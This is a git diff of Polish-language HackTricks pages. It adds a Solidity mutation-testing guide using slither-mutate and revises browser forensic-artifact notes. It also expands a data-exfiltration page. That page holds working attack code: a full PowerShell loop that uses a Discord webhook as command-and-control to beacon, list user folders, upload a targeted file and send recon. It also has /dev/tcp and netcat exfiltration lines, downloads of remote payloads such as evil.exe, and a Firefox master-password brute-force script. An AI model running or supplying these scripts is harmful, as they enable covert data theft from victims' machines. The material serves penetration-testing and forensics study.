Te praktyki i mechanizmy są podstawą dla każdego, kto chce korzystać z kryptowalut, priorytetowo traktując prywatność i bezpieczeństwo.
## Smart Contract Security
- Mutation testing to find blind spots in test suites:
{{#ref}}
../smart-contract-security/mutation-testing-with-slither.md
{{#endref}}
## Źródła
- [https://en.wikipedia.org/wiki/Proof_of_stake](https://en.wikipedia.org/wiki/Proof_of_stake)

116
src/blockchain/smart-contract-security/mutation-testing-with-slither.md Normal file
View File

@ -0,0 +1,116 @@
# Mutation Testing dla Solidity z Slither (slither-mutate)
{{#include ../../../banners/hacktricks-training.md}}
Mutation testing "tests your tests" poprzez systematyczne wprowadzanie drobnych zmian (mutantów) w twoim kodzie Solidity i ponowne uruchamianie zestawu testów. Jeśli test się nie powiedzie, mutant zostaje zabity. Jeśli testy nadal przechodzą, mutant przeżywa, ujawniając ślepy punkt w twoim zestawie testów, którego pokrycie linii/gałęzi nie wykryje.
Kluczowa myśl: Pokrycie pokazuje, że kod został wykonany; mutation testing pokazuje, czy zachowanie jest faktycznie sprawdzone.
## Dlaczego pokrycie może wprowadzać w błąd
Rozważ ten prosty warunek progowy:
```solidity
function verifyMinimumDeposit(uint256 deposit) public returns (bool) {
if (deposit >= 1 ether) {
return true;
} else {
return false;
}
}
```
Testy jednostkowe, które sprawdzają tylko wartość poniżej oraz wartość powyżej progu, mogą osiągnąć 100% pokrycia linii/gałęzi, jednocześnie nie asercjonując granicy równości (==). Refaktoring do `deposit >= 2 ether` nadal przejdzie takie testy, cicho łamiąc logikę protokołu.
Mutation testing ujawnia tę lukę, mutując warunek i weryfikując, że testy nie przejdą.
## Najczęstsze operatory mutacji w Solidity
Slithers mutation engine stosuje wiele drobnych modyfikacji zmieniających semantykę, takich jak:
- Zamiana operatorów: `+``-`, `*``/`, itp.
- Zamiana przypisania: `+=``=`, `-=``=`
- Zamiana stałych: niezerowe → `0`, `true``false`
- Negacja/zamiana warunku w `if`/pętlach
- Komentowanie całych linii (CR: Comment Replacement)
- Zamiana linii na `revert()`
- Zamiany typów danych: np. `int128``int64`
Cel: Zabić 100% wygenerowanych mutantów lub uzasadnić ocalałe przypadki jasnym wyjaśnieniem.
## Uruchamianie Mutation testing za pomocą slither-mutate
Wymagania: Slither v0.10.2+.
- Wypisz opcje i mutatory:
```bash
slither-mutate --help
slither-mutate --list-mutators
```
- Przykład Foundry (przechwyć wyniki i zachowaj pełny log):
```bash
slither-mutate ./src/contracts --test-cmd="forge test" &> >(tee mutation.results)
```
- Jeśli nie używasz Foundry, zamień `--test-cmd` na komendę uruchamiającą testy (np. `npx hardhat test`, `npm test`).
Artefakty i raporty są domyślnie przechowywane w `./mutation_campaign`. Niewykryte (przetrwałe) mutanty są tam kopiowane do wglądu.
### Zrozumienie wyników
Wiersze raportu wyglądają tak:
```text
INFO:Slither-Mutate:Mutating contract ContractName
INFO:Slither-Mutate:[CR] Line 123: 'original line' ==> '//original line' --> UNCAUGHT
```
- The tag in brackets is the mutator alias (e.g., `CR` = Comment Replacement).
- `UNCAUGHT` means tests passed under the mutated behavior → missing assertion.
## Reducing runtime: prioritize impactful mutants
Mutation campaigns can take hours or days. Tips to reduce cost:
- Scope: Start with critical contracts/directories only, then expand.
- Prioritize mutators: If a high-priority mutant on a line survives (e.g., entire line commented), you can skip lower-priority variants for that line.
- Parallelize tests if your runner allows it; cache dependencies/builds.
- Fail-fast: stop early when a change clearly demonstrates an assertion gap.
## Triage workflow for surviving mutants
1) Inspect the mutated line and behavior.
- Reproduce locally by applying the mutated line and running a focused test.
2) Strengthen tests to assert state, not only return values.
- Add equality-boundary checks (e.g., test threshold `==`).
- Assert post-conditions: balances, total supply, authorization effects, and emitted events.
3) Replace overly permissive mocks with realistic behavior.
- Ensure mocks enforce transfers, failure paths, and event emissions that occur on-chain.
4) Add invariants for fuzz tests.
- E.g., conservation of value, non-negative balances, authorization invariants, monotonic supply where applicable.
5) Re-run slither-mutate until survivors are killed or explicitly justified.
## Case study: revealing missing state assertions (Arkis protocol)
A mutation campaign during an audit of the Arkis DeFi protocol surfaced survivors like:
```text
INFO:Slither-Mutate:[CR] Line 33: 'cmdsToExecute.last().value = _cmd.value' ==> '//cmdsToExecute.last().value = _cmd.value' --> UNCAUGHT
```
Zakomentowanie przypisania nie złamało testów, co dowodzi brakujących asercji stanu po wykonaniu. Przyczyna: kod zaufał kontrolowanej przez użytkownika zmiennej `_cmd.value` zamiast walidować rzeczywiste transfery tokenów. Atakujący mógłby rozdesynchronizować oczekiwane i rzeczywiste transfery, aby opróżnić środki. Skutek: ryzyko wysokiej wagi dla wypłacalności protokołu.
Wytyczne: Traktuj mutanty, które przetrwały i wpływają na transfery wartości, księgowość lub kontrolę dostępu, jako wysokiego ryzyka, dopóki nie zostaną wyeliminowane.
## Praktyczna lista kontrolna
- Uruchom ukierunkowaną kampanię:
- `slither-mutate ./src/contracts --test-cmd="forge test"`
- Przejrzyj mutanty, które przetrwały, i napisz testy/inwarianty, które zawiodłyby przy zmienionym zachowaniu.
- Zweryfikuj salda, podaż, uprawnienia i zdarzenia.
- Dodaj testy brzegowe (`==`, overflows/underflows, zero-address, zero-amount, empty arrays).
- Zastąp nierealistyczne mocki; zasymuluj tryby awarii.
- Powtarzaj, aż wszystkie mutanty zostaną wyeliminowane lub uzasadnione komentarzami i wyjaśnieniem.
## Źródła
- [Use mutation testing to find the bugs your tests don't catch (Trail of Bits)](https://blog.trailofbits.com/2025/09/18/use-mutation-testing-to-find-the-bugs-your-tests-dont-catch/)
- [Arkis DeFi Prime Brokerage Security Review (Appendix C)](https://github.com/trailofbits/publications/blob/master/reviews/2024-12-arkis-defi-prime-brokerage-securityreview.pdf)
- [Slither (GitHub)](https://github.com/crytic/slither)
{{#include ../../../banners/hacktricks-training.md}}

127
src/generic-hacking/exfiltration.md
View File

@ -1,12 +1,12 @@
# Exfiltracja
# Exfiltration
{{#include ../banners/hacktricks-training.md}}
## Powszechnie dozwolone domeny do eksfiltracji informacji
## Commonly whitelisted domains to exfiltrate information
Sprawdź [https://lots-project.com/](https://lots-project.com/), aby znaleźć powszechnie dozwolone domeny, które można wykorzystać
Sprawdź [https://lots-project.com/](https://lots-project.com/), aby znaleźć powszechnie dozwolone (whitelisted) domeny, które można wykorzystać
## Kopiuj\&Wklej Base64
## Copy\&Paste Base64
**Linux**
```bash
@ -42,7 +42,7 @@ Start-BitsTransfer -Source $url -Destination $output
#OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
```
### Upload files
### Przesyłanie plików
- [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
- [**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149)
@ -100,14 +100,99 @@ if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
###
```
## Webhooks (Discord/Slack/Teams) for C2 & Data Exfiltration
Webhooks są punktami końcowymi HTTPS tylko do zapisu, które akceptują JSON i opcjonalne części plików. Zwykle są dozwolone dla zaufanych domen SaaS i nie wymagają OAuth/API keys, co czyni je przydatnymi do niskotarciowego beaconing i exfiltration.
Key ideas:
- Punkt końcowy: Discord uses https://discord.com/api/webhooks/<id>/<token>
- POST multipart/form-data z częścią nazwaną payload_json zawierającą {"content":"..."} oraz opcjonalną częścią pliku nazwaną file.
- Wzorzec pętli operatora: periodic beacon -> directory recon -> targeted file exfil -> recon dump -> sleep. HTTP 204 NoContent/200 OK potwierdzają dostarczenie.
PowerShell PoC (Discord):
```powershell
# 1) Configure webhook and optional target file
$webhook = "https://discord.com/api/webhooks/YOUR_WEBHOOK_HERE"
$target = Join-Path $env:USERPROFILE "Documents\SENSITIVE_FILE.bin"
# 2) Reuse a single HttpClient
$client = [System.Net.Http.HttpClient]::new()
function Send-DiscordText {
param([string]$Text)
$payload = @{ content = $Text } | ConvertTo-Json -Compress
$jsonContent = New-Object System.Net.Http.StringContent($payload, [System.Text.Encoding]::UTF8, "application/json")
$mp = New-Object System.Net.Http.MultipartFormDataContent
$mp.Add($jsonContent, "payload_json")
$resp = $client.PostAsync($webhook, $mp).Result
Write-Host "[Discord] text -> $($resp.StatusCode)"
}
function Send-DiscordFile {
param([string]$Path, [string]$Name)
if (-not (Test-Path $Path)) { return }
$bytes = [System.IO.File]::ReadAllBytes($Path)
$fileContent = New-Object System.Net.Http.ByteArrayContent(,$bytes)
$fileContent.Headers.ContentType = [System.Net.Http.Headers.MediaTypeHeaderValue]::Parse("application/octet-stream")
$json = @{ content = ":package: file exfil: $Name" } | ConvertTo-Json -Compress
$jsonContent = New-Object System.Net.Http.StringContent($json, [System.Text.Encoding]::UTF8, "application/json")
$mp = New-Object System.Net.Http.MultipartFormDataContent
$mp.Add($jsonContent, "payload_json")
$mp.Add($fileContent, "file", $Name)
$resp = $client.PostAsync($webhook, $mp).Result
Write-Host "[Discord] file $Name -> $($resp.StatusCode)"
}
# 3) Beacon/recon/exfil loop
$ctr = 0
while ($true) {
$ctr++
# Beacon
$beacon = "━━━━━━━━━━━━━━━━━━`n:satellite: Beacon`n```User: $env:USERNAME`nHost: $env:COMPUTERNAME```"
Send-DiscordText -Text $beacon
# Every 2nd: quick folder listing
if ($ctr % 2 -eq 0) {
$dirs = @("Documents","Desktop","Downloads","Pictures")
$acc = foreach ($d in $dirs) {
$p = Join-Path $env:USERPROFILE $d
$items = Get-ChildItem -Path $p -ErrorAction SilentlyContinue | Select-Object -First 3 -ExpandProperty Name
if ($items) { "`n$d:`n - " + ($items -join "`n - ") }
}
Send-DiscordText -Text (":file_folder: **User Dirs**`n━━━━━━━━━━━━━━━━━━`n```" + ($acc -join "") + "```")
}
# Every 3rd: targeted exfil
if ($ctr % 3 -eq 0) { Send-DiscordFile -Path $target -Name ([IO.Path]::GetFileName($target)) }
# Every 4th: basic recon
if ($ctr % 4 -eq 0) {
$who = whoami
$ip = ipconfig | Out-String
$tmp = Join-Path $env:TEMP "recon.txt"
"whoami:: $who`r`nIPConfig::`r`n$ip" | Out-File -FilePath $tmp -Encoding utf8
Send-DiscordFile -Path $tmp -Name "recon.txt"
}
Start-Sleep -Seconds 20
}
```
Notatki:
- Podobne wzorce dotyczą innych platform współpracy (Slack/Teams) korzystających z incoming webhooks; dostosuj URL i JSON schema odpowiednio.
- Dla DFIR artefaktów cache Discord Desktop i odzyskiwania webhook/API, zobacz:
{{#ref}}
../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/discord-cache-forensics.md
{{#endref}}
## FTP
### Serwer FTP (python)
### FTP server (python)
```bash
pip3 install pyftpdlib
python3 -m pyftpdlib -p 21
```
### Serwer FTP (NodeJS)
### FTP serwer (NodeJS)
```
sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp
@ -130,7 +215,7 @@ mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
```
### **Klient** Windows
### **Windows** klient
```bash
#Work well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
@ -150,7 +235,7 @@ kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`
```
Lub utwórz udostępnienie smb **używając samby**:
Albo utwórz udział smb **korzystając z samba**:
```bash
apt-get install samba
mkdir /tmp/smb
@ -181,7 +266,7 @@ scp <username>@<Attacker_IP>:<directory>/<filename>
```
## SSHFS
Jeśli ofiara ma SSH, atakujący może zamontować katalog z ofiary do atakującego.
Jeśli ofiara ma SSH, atakujący może zamontować katalog z maszyny ofiary na swoją.
```bash
sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
@ -194,12 +279,12 @@ nc -vn <IP> 4444 < exfil_file
```
## /dev/tcp
### Pobierz plik od ofiary
### Pobierz plik z ofiary
```bash
nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
```
### Prześlij plik do ofiary
### Prześlij plik na maszynę ofiary
```bash
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
# Inside victim
@ -228,13 +313,13 @@ sniff(iface="tun0", prn=process_packet)
```
## **SMTP**
Jeśli możesz wysłać dane do serwera SMTP, możesz stworzyć SMTP, aby odbierać dane za pomocą Pythona:
Jeśli możesz wysyłać dane do serwera SMTP, możesz stworzyć serwer SMTP w pythonie, aby odbierać te dane:
```bash
sudo python -m smtpd -n -c DebuggingServer :25
```
## TFTP
Domyślnie w XP i 2003 (w innych systemach musi być wyraźnie dodany podczas instalacji)
Domyślnie w XP i 2003 (w innych należy go jawnie dodać podczas instalacji)
W Kali, **uruchom serwer TFTP**:
```bash
@ -248,13 +333,13 @@ cp /path/tp/nc.exe /tftp
pip install ptftpd
ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>
```
W **victim**, połącz się z serwerem Kali:
Na **victim** połącz się z serwerem Kali:
```bash
tftp -i <KALI-IP> get nc.exe
```
## PHP
Pobierz plik z PHP onelinerem:
Pobierz plik za pomocą PHP oneliner:
```bash
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
```
@ -296,13 +381,13 @@ cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
```
## Debug.exe
Program `debug.exe` nie tylko umożliwia inspekcję plików binarnych, ale także ma **zdolność do odbudowywania ich z hex**. Oznacza to, że podając hex pliku binarnego, `debug.exe` może wygenerować plik binarny. Ważne jest jednak, aby zauważyć, że debug.exe ma **ograniczenie w składaniu plików do 64 kb**.
Program `debug.exe` nie tylko pozwala na inspekcję plików binary, ale ma też **możliwość odbudowy ich z hex**. Oznacza to, że dostarczając hex pliku binary, `debug.exe` może wygenerować plik binary. Warto jednak zauważyć, że `debug.exe` ma **ograniczenie składania plików do 64 kb**.
```bash
# Reduce the size
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt
```
Następnie skopiuj i wklej tekst do powłoki systemu Windows, a plik o nazwie nc.exe zostanie utworzony.
Następnie wklej tekst do windows-shell, a plik o nazwie nc.exe zostanie utworzony.
- [https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html](https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html)
@ -310,4 +395,10 @@ Następnie skopiuj i wklej tekst do powłoki systemu Windows, a plik o nazwie nc
- [https://github.com/Stratiz/DNS-Exfil](https://github.com/Stratiz/DNS-Exfil)
## Źródła
- [Discord as a C2 and the cached evidence left behind](https://www.pentestpartners.com/security-blog/discord-as-a-c2-and-the-cached-evidence-left-behind/)
- [Discord Webhooks Execute Webhook](https://discord.com/developers/docs/resources/webhook#execute-webhook)
- [Discord Forensic Suite (cache parser)](https://github.com/jwdfir/discord_cache_parser)
{{#include ../banners/hacktricks-training.md}}

153
src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
View File

@ -4,55 +4,55 @@
## Artefakty przeglądarek <a href="#id-3def" id="id-3def"></a>
Artefakty przeglądarek obejmują różne typy danych przechowywanych przez przeglądarki internetowe, takie jak historia nawigacji, zakładki i dane pamięci podręcznej. Artefakty te są przechowywane w określonych folderach w systemie operacyjnym, różniących się lokalizacją i nazwą w zależności od przeglądarki, ale ogólnie przechowują podobne typy danych.
Artefakty przeglądarek obejmują różne typy danych przechowywanych przez przeglądarki internetowe, takie jak historia nawigacji, zakładki i dane cache. Artefakty te są przechowywane w określonych folderach systemu operacyjnego, różnią się lokalizacją i nazwą w zależności od przeglądarki, lecz zazwyczaj zawierają podobne typy danych.
Oto podsumowanie najczęstszych artefaktów przeglądarek:
Poniżej podsumowanie najczęstszych artefaktów przeglądarki:
- **Historia nawigacji**: Śledzi wizyty użytkownika na stronach internetowych, przydatna do identyfikacji wizyt na złośliwych stronach.
- **Dane autouzupełniania**: Sugestie oparte na częstych wyszukiwaniach, oferujące wgląd w połączeniu z historią nawigacji.
- **Zakładki**: Strony zapisane przez użytkownika dla szybkiego dostępu.
- **Rozszerzenia i dodatki**: Rozszerzenia przeglądarki lub dodatki zainstalowane przez użytkownika.
- **Pamięć podręczna**: Przechowuje treści internetowe (np. obrazy, pliki JavaScript) w celu poprawy czasu ładowania stron, cenne dla analizy kryminalistycznej.
- **Loginy**: Przechowywane dane logowania.
- **Favikony**: Ikony związane ze stronami internetowymi, pojawiające się w kartach i zakładkach, przydatne do uzyskania dodatkowych informacji o wizytach użytkownika.
- **Sesje przeglądarki**: Dane związane z otwartymi sesjami przeglądarki.
- **Pobrania**: Rejestry plików pobranych przez przeglądarkę.
- **Dane formularzy**: Informacje wprowadzone w formularzach internetowych, zapisane do przyszłych sugestii autouzupełniania.
- **Miniatury**: Obrazy podglądowe stron internetowych.
- **Navigation History**: Śledzi odwiedziny użytkownika na stronach, przydatne do identyfikacji wejść na złośliwe witryny.
- **Autocomplete Data**: Sugestie oparte na częstych wyszukiwaniach, dostarczające wskazówek w połączeniu z historią nawigacji.
- **Bookmarks**: Strony zapisane przez użytkownika do szybkiego dostępu.
- **Extensions and Add-ons**: Rozszerzenia lub dodatki zainstalowane przez użytkownika.
- **Cache**: Przechowuje zawartość sieciową (np. obrazy, pliki JavaScript) w celu przyspieszenia ładowania stron, przydatne w analizie sądowej.
- **Logins**: Zapisane dane logowania.
- **Favicons**: Ikony powiązane ze stronami, widoczne na kartach i w zakładkach, przydatne jako dodatkowa informacja o odwiedzinach użytkownika.
- **Browser Sessions**: Dane związane z otwartymi sesjami przeglądarki.
- **Downloads**: Rejestry plików pobranych przez przeglądarkę.
- **Form Data**: Informacje wpisane w formularze internetowe, zapisywane do przyszłego autouzupełniania.
- **Thumbnails**: Podglądy stron.
- **Custom Dictionary.txt**: Słowa dodane przez użytkownika do słownika przeglądarki.
## Firefox
Firefox organizuje dane użytkownika w profilach, przechowywanych w określonych lokalizacjach w zależności od systemu operacyjnego:
Firefox organizuje dane użytkownika w profilach, przechowywanych w konkretnych lokalizacjach w zależności od systemu operacyjnego:
- **Linux**: `~/.mozilla/firefox/`
- **MacOS**: `/Users/$USER/Library/Application Support/Firefox/Profiles/`
- **Windows**: `%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\`
Plik `profiles.ini` w tych katalogach zawiera listę profili użytkowników. Dane każdego profilu są przechowywane w folderze nazwanym w zmiennej `Path` w `profiles.ini`, znajdującym się w tym samym katalogu co `profiles.ini`. Jeśli folder profilu jest brakujący, mógł zostać usunięty.
Plik `profiles.ini` w tych katalogach zawiera listę profili użytkownika. Dane każdego profilu są przechowywane w folderze nazwanego w zmiennej `Path` w `profiles.ini`, znajdującym się w tym samym katalogu co `profiles.ini`. Jeśli folder profilu nie istnieje, mogło to oznaczać jego usunięcie.
W każdym folderze profilu można znaleźć kilka ważnych plików:
W każdym folderze profilu można znaleźć kilka istotnych plików:
- **places.sqlite**: Przechowuje historię, zakładki i pobrania. Narzędzia takie jak [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) na Windows mogą uzyskać dostęp do danych historii.
- Użyj konkretnych zapytań SQL, aby wyodrębnić informacje o historii i pobraniach.
- **places.sqlite**: Przechowuje historię, zakładki i pobrane pliki. Narzędzia takie jak [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) na Windows mogą uzyskać dostęp do danych historii.
- Use specific SQL queries to extract history and downloads information.
- **bookmarkbackups**: Zawiera kopie zapasowe zakładek.
- **formhistory.sqlite**: Przechowuje dane formularzy internetowych.
- **handlers.json**: Zarządza obsługą protokołów.
- **persdict.dat**: Słowa ze słownika użytkownika.
- **persdict.dat**: Niestandardowe słowa słownika.
- **addons.json** i **extensions.sqlite**: Informacje o zainstalowanych dodatkach i rozszerzeniach.
- **cookies.sqlite**: Przechowywanie ciasteczek, z [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) dostępnym do inspekcji na Windows.
- **cache2/entries** lub **startupCache**: Dane pamięci podręcznej, dostępne za pomocą narzędzi takich jak [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html).
- **favicons.sqlite**: Przechowuje favikony.
- **cookies.sqlite**: Przechowywanie cookies, z [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) dostępnym do przeglądu na Windows.
- **cache2/entries** lub **startupCache**: Dane cache, dostępne przez narzędzia takie jak [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html).
- **favicons.sqlite**: Przechowuje favicons.
- **prefs.js**: Ustawienia i preferencje użytkownika.
- **downloads.sqlite**: Starsza baza danych pobrań, teraz zintegrowana z places.sqlite.
- **thumbnails**: Miniatury stron internetowych.
- **logins.json**: Szyfrowane informacje logowania.
- **key4.db** lub **key3.db**: Przechowuje klucze szyfrujące do zabezpieczania wrażliwych informacji.
- **downloads.sqlite**: Starsza baza pobrań, obecnie zintegrowana z `places.sqlite`.
- **thumbnails**: Miniatury stron.
- **logins.json**: Zaszyfrowane informacje o logowaniach.
- **key4.db** lub **key3.db**: Przechowuje klucze szyfrujące do zabezpieczenia informacji wrażliwych.
Dodatkowo, sprawdzenie ustawień przeglądarki dotyczących ochrony przed phishingiem można przeprowadzić, wyszukując wpisy `browser.safebrowsing` w `prefs.js`, co wskazuje, czy funkcje bezpiecznego przeglądania są włączone czy wyłączone.
Dodatkowo, ustawienia anty-phishingowe przeglądarki można sprawdzić, wyszukując wpisy `browser.safebrowsing` w `prefs.js`, co wskazuje czy funkcje bezpiecznego przeglądania są włączone czy wyłączone.
Aby spróbować odszyfrować hasło główne, możesz użyć [https://github.com/unode/firefox_decrypt](https://github.com/unode/firefox_decrypt)\
Za pomocą poniższego skryptu i wywołania możesz określić plik haseł do brutalnego wymuszenia:
Aby spróbować odszyfrować główne hasło, możesz użyć [https://github.com/unode/firefox_decrypt](https://github.com/unode/firefox_decrypt)\
Z poniższym skryptem i wywołaniem możesz podać plik z hasłami do brute force:
```bash:brute.sh
#!/bin/bash
@ -75,88 +75,95 @@ Google Chrome przechowuje profile użytkowników w określonych lokalizacjach w
W tych katalogach większość danych użytkownika można znaleźć w folderach **Default/** lub **ChromeDefaultData/**. Następujące pliki zawierają istotne dane:
- **Historia**: Zawiera adresy URL, pobrania i słowa kluczowe wyszukiwania. Na Windowsie można użyć [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) do odczytania historii. Kolumna "Typ przejścia" ma różne znaczenia, w tym kliknięcia użytkownika w linki, wpisane adresy URL, przesyłanie formularzy i przeładowania stron.
- **Ciasteczka**: Przechowuje ciasteczka. Do inspekcji dostępne jest [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html).
- **Cache**: Przechowuje dane w pamięci podręcznej. Aby sprawdzić, użytkownicy Windows mogą skorzystać z [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html).
- **Zakładki**: Zakładki użytkownika.
- **Dane sieciowe**: Zawiera historię formularzy.
- **Favikony**: Przechowuje favikony stron internetowych.
- **Dane logowania**: Zawiera dane logowania, takie jak nazwy użytkowników i hasła.
- **Bieżąca sesja**/**Bieżące karty**: Dane o bieżącej sesji przeglądania i otwartych kartach.
- **Ostatnia sesja**/**Ostatnie karty**: Informacje o stronach aktywnych podczas ostatniej sesji przed zamknięciem Chrome.
- **Rozszerzenia**: Katalogi dla rozszerzeń przeglądarki i dodatków.
- **Miniatury**: Przechowuje miniatury stron internetowych.
- **Preferencje**: Plik bogaty w informacje, w tym ustawienia dla wtyczek, rozszerzeń, wyskakujących okienek, powiadomień i innych.
- **Wbudowana ochrona przed phishingiem przeglądarki**: Aby sprawdzić, czy ochrona przed phishingiem i złośliwym oprogramowaniem jest włączona, uruchom `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`. Szukaj `{"enabled: true,"}` w wynikach.
- **History**: Zawiera URL-e, pobrane pliki i słowa kluczowe wyszukiwań. W systemie Windows można użyć [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) do odczytu historii. Kolumna "Transition Type" ma różne znaczenia, m.in. kliknięcia użytkownika w linki, wpisane adresy URL, wysyłanie formularzy i przeładowania stron.
- **Cookies**: Przechowuje cookies. Do analizy dostępne jest narzędzie [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html).
- **Cache**: Przechowuje dane w cache. Aby je przejrzeć, użytkownicy Windows mogą skorzystać z [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html).
## **Odzyskiwanie danych z bazy SQLite**
Aplikacje desktopowe oparte na Electron (np. Discord) również używają Chromium Simple Cache i pozostawiają bogate artefakty na dysku. Zobacz:
Jak można zauważyć w poprzednich sekcjach, zarówno Chrome, jak i Firefox używają baz danych **SQLite** do przechowywania danych. Możliwe jest **odzyskanie usuniętych wpisów za pomocą narzędzia** [**sqlparse**](https://github.com/padfoot999/sqlparse) **lub** [**sqlparse_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases).
{{#ref}}
discord-cache-forensics.md
{{#endref}}
- **Bookmarks**: Zakładki użytkownika.
- **Web Data**: Zawiera historię formularzy.
- **Favicons**: Przechowuje favikony stron.
- **Login Data**: Zawiera poświadczenia logowania, takie jak nazwy użytkowników i hasła.
- **Current Session**/**Current Tabs**: Dane o bieżącej sesji przeglądania i otwartych kartach.
- **Last Session**/**Last Tabs**: Informacje o stronach aktywnych podczas ostatniej sesji przed zamknięciem Chrome.
- **Extensions**: Katalogi rozszerzeń i dodatków przeglądarki.
- **Thumbnails**: Przechowuje miniatury stron.
- **Preferences**: Plik zawierający wiele informacji, w tym ustawienia wtyczek, rozszerzeń, okienek wyskakujących, powiadomień i inne.
- **Browsers built-in anti-phishing**: Aby sprawdzić, czy ochrona przed phishingiem i malware jest włączona, uruchom `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`. Szukaj w wynikach `{"enabled: true,"}`.
## **SQLite DB Data Recovery**
Jak widać w poprzednich sekcjach, zarówno Chrome, jak i Firefox używają baz danych **SQLite** do przechowywania danych. Możliwe jest **odzyskanie usuniętych wpisów przy użyciu narzędzia** [**sqlparse**](https://github.com/padfoot999/sqlparse) **lub** [**sqlparse_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases).
## **Internet Explorer 11**
Internet Explorer 11 zarządza swoimi danymi i metadanymi w różnych lokalizacjach, co ułatwia oddzielanie przechowywanych informacji i ich odpowiadających szczegółów dla łatwego dostępu i zarządzania.
Internet Explorer 11 przechowuje dane i metadane w różnych lokalizacjach, co ułatwia oddzielenie przechowywanych informacji od odpowiadających im szczegółów, umożliwiając łatwy dostęp i zarządzanie.
### Przechowywanie metadanych
### Metadata Storage
Metadane dla Internet Explorera są przechowywane w `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (gdzie VX to V01, V16 lub V24). Wraz z tym plikiem `V01.log` może pokazywać różnice w czasie modyfikacji w porównaniu do `WebcacheVX.data`, co wskazuje na potrzebę naprawy za pomocą `esentutl /r V01 /d`. Te metadane, przechowywane w bazie danych ESE, można odzyskać i zbadać za pomocą narzędzi takich jak photorec i [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html). W tabeli **Containers** można dostrzec konkretne tabele lub kontenery, w których przechowywany jest każdy segment danych, w tym szczegóły pamięci podręcznej dla innych narzędzi Microsoftu, takich jak Skype.
Metadane Internet Explorera są przechowywane w %userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data (gdzie VX to V01, V16 lub V24). Towarzyszący plik `V01.log` może wykazywać rozbieżności czasów modyfikacji w stosunku do `WebcacheVX.data`, co wskazuje na konieczność naprawy przy użyciu `esentutl /r V01 /d`. Te metadane, zawarte w bazie ESE, można odzyskać i przeanalizować odpowiednio za pomocą narzędzi takich jak photorec oraz [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html). W tabeli **Containers** można rozpoznać konkretne tabele lub kontenery, w których przechowywany jest każdy segment danych, włącznie z informacjami o cache dla innych narzędzi Microsoft, takich jak Skype.
### Inspekcja pamięci podręcznej
### Cache Inspection
Narzędzie [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) umożliwia inspekcję pamięci podręcznej, wymagając lokalizacji folderu z danymi pamięci podręcznej. Metadane pamięci podręcznej obejmują nazwę pliku, katalog, liczbę dostępu, pochodzenie URL oraz znaczniki czasowe wskazujące czasy utworzenia, dostępu, modyfikacji i wygaśnięcia pamięci podręcznej.
Narzędzie [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) umożliwia przeglądanie cache, wymagając lokalizacji folderu z wyodrębnionymi danymi cache. Metadane cache obejmują nazwę pliku, katalog, liczbę dostępów, źródłowy URL oraz znaczniki czasu wskazujące utworzenie, dostęp, modyfikację i wygaśnięcie cache.
### Zarządzanie ciasteczkami
### Cookies Management
Ciasteczka można badać za pomocą [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), a metadane obejmują nazwy, adresy URL, liczby dostępu i różne szczegóły czasowe. Ciasteczka trwałe są przechowywane w `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, a ciasteczka sesyjne znajdują się w pamięci.
Cookies można badać za pomocą [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), a metadane obejmują nazwy, URL-e, liczbę dostępów oraz różne informacje czasowe. Trwałe cookies są przechowywane w `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, natomiast cookies sesyjne znajdują się w pamięci.
### Szczegóły pobierania
### Download Details
